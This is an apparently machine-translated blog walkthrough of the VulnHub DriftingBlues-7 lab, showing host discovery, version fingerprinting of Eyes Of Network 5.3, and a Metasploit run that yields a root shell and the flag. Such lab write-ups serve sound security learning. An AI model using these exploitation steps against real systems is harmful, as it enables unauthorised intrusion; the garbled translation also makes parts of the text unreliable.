After reading this article, I will teach you to play with the penetration test target vulnhub - drivetingblues-7

Vulnhub Introduction to target machine ：

vulnhub It is a comprehensive shooting range providing various vulnerability platforms , A variety of virtual machines can be downloaded , Local VM Open the can , Complete the penetration test like a game 、 Raise the right 、 Exploit 、 Code audit and other interesting actual combat .

Update this issue Vulnhub DriftingBlues series I still found it as usual FLAG that will do , May be biased towards CTF spot .

Vulnhub Target download ：

Official website address ：https://www.vulnhub.com/entry/driftingblues-7,680/


After downloading, unzip the installation package Then try VMware that will do .

Vulnhub Detailed explanation of target vulnerability ：

①： information gathering ：

kali Use in netdiscover Discover the host

Infiltration machine ：kali IP ：192.168.205.133 Drone aircraft IP ：192.168.205.144

There are many ports opened this time Let's take a look at the old one first 80 The port page found is Eyes Of Network（ See you for the first time ）
Use dirsearch Sweep the backstage But we didn't find the desired results There is no usable information

Here is to see that others have scanned what they have not I don't know why

visit ：https://192.168.205.144/bower.json Found version number by 5.3

Use kali Search for the corresponding vulnerabilities ：searchsploit Eyes Of Network 5.3

②： Exploit ：

open msf Search related keywords Eyes Of Network

show options   # View the parameters that need to be set 

set  RHOST 192.168.205.144
set LHOST 192.168.205.133
run

Get into shell Pattern cd /root see flag.txt

③： see flag：

So far, we have obtained all flag, End of penetration test .

Vulnhub Target penetration summary ：

Feel this target It is particularly simple and does not involve the operation of raising the right Namely msf Basic use of

DriftingBlues The seventh target aircraft of the series will be updated in the future , It's not easy to create I hope that's helpful If you like it, please give me one button three times Your happiness is my greatest happiness ！！